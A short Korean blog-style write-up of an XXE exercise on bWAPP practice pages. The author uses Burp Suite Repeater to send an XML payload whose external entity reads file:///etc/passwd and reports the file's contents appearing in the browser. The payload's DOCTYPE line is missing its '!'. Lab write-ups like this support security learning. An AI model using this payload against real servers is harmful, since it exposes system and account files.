Chapter 25 XML 외부 엔티티 공격

 

XML 외부 엔티티 공격은 SYSTEM 키워드를 사용한다.

SYSTEM 키워드로 XML 파서를 발생하게 하면 페이지의 내용을 대체하는 권한이 생긴다

=> 공격자는 XML 파서로 서버 시스템에 접근 가능!

 

 

 

xxe-1.php 실습 페이지다.

 

 

burp suite로 실습 페이지의 패킷을 가로챘다.

 

 

 

<?xml version="1.0" encoding="utf-8"?>
<DOCTYPE root [
<!ENTITY bWAPP SYSTEM "file:///etc/passwd">
]>
<reset><login>&bWAPP;</login><secret>blash</secret></reset>

 

repeater로 요청을 보내 위 xml코드를 입력 후 send 해주었다.

 

send 후 요청, 응답 중 한 패널에서 'show response in browser' 메뉴를 클릭하면 URL을 볼 수 있다.

 

이 URL을 복사해 웹브라우저에 입력했더니 passwd 파일 안에 있는 내용을 웹 브라우저에 출력할 수 있었다.

 

이 xxe-2.php 페이지는 직접 접근이 불가능한 페이지지만 서버의 계정 정보를 출력한다.